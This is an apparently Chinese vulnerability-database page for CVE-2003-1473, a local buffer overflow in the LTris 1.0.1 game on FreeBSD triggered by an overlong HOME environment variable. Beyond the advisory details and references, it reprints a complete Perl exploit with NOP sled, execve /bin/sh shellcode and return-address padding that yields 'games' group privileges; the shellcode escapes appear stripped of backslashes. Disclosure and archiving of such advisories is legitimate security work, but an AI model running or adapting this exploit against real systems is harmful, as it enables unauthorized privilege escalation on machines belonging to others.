Lgames LTris本地内存破坏漏洞

Lgames LTris本地内存破坏漏洞

漏洞ID 1107313 漏洞类型 缓冲区溢出
发布时间 2003-05-09 更新时间 2003-12-31
图片[1]-Lgames LTris本地内存破坏漏洞-安全小百科CVE编号 CVE-2003-1473
图片[2]-Lgames LTris本地内存破坏漏洞-安全小百科CNNVD-ID CNNVD-200312-451
漏洞平台 FreeBSD CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/22574
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-451
|漏洞详情
FreeBSDPortsCollection2003-02-25及其早期版本的LTris1.0.1版本存在缓冲区溢出漏洞。本地用户可以借助超长HOME环境变量执行任意带有gid”games”许可的任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/7537/info

A memory corruption vulnerability has been reported for LTris that may result in a local attacker obtaining group 'games' privileges. 

#!/usr/bin/perl
$len = 520;
$ret = 0xbfbff825;
$nop = "x90";
$offset = 0;
$shellcode =    "xebx0ex5ex31xc0x88x46x07x50x50x56". #freebsd 29 bytes
                "xb0x3bx50xcdx80xe8xedxffxffxffx2f". #execve /bin/sh
                "x62x69x6ex2fx73x68x23";                 #zillionATsafemode.org

if (@ARGV == 1) {
    $offset = $ARGV[0];
}
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
print("Address: 0x", sprintf('%lx',($ret + $offset)), "n");
$new_ret = pack('l', ($ret + $offset));

for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}
local($ENV{'HOME'}) = $buffer; 
exec("ltris 2>/dev/null");
|参考资料

来源:XF
名称:ltris-bo(11978)
链接:http://xforce.iss.net/xforce/xfdb/11978
来源:BID
名称:7537
链接:http://www.securityfocus.com/bid/7537
来源:BUGTRAQ
名称:20030508ltris-and-slashem-ttypossibletrouble
链接:http://www.securityfocus.com/archive/1/321001
来源:FULLDISC
名称:20030509ltris-and-slashem-ttypossibletrouble
链接:http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2003-05/0122.html

相关推荐: BSD-Games 2.x – Monop Player Name Local Buffer Overrun (1)

BSD-Games 2.x – Monop Player Name Local Buffer Overrun (1) 漏洞ID 1054119 漏洞类型 发布时间 2003-08-25 更新时间 2003-08-25 CVE编号 N/A CNNVD-ID N/…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享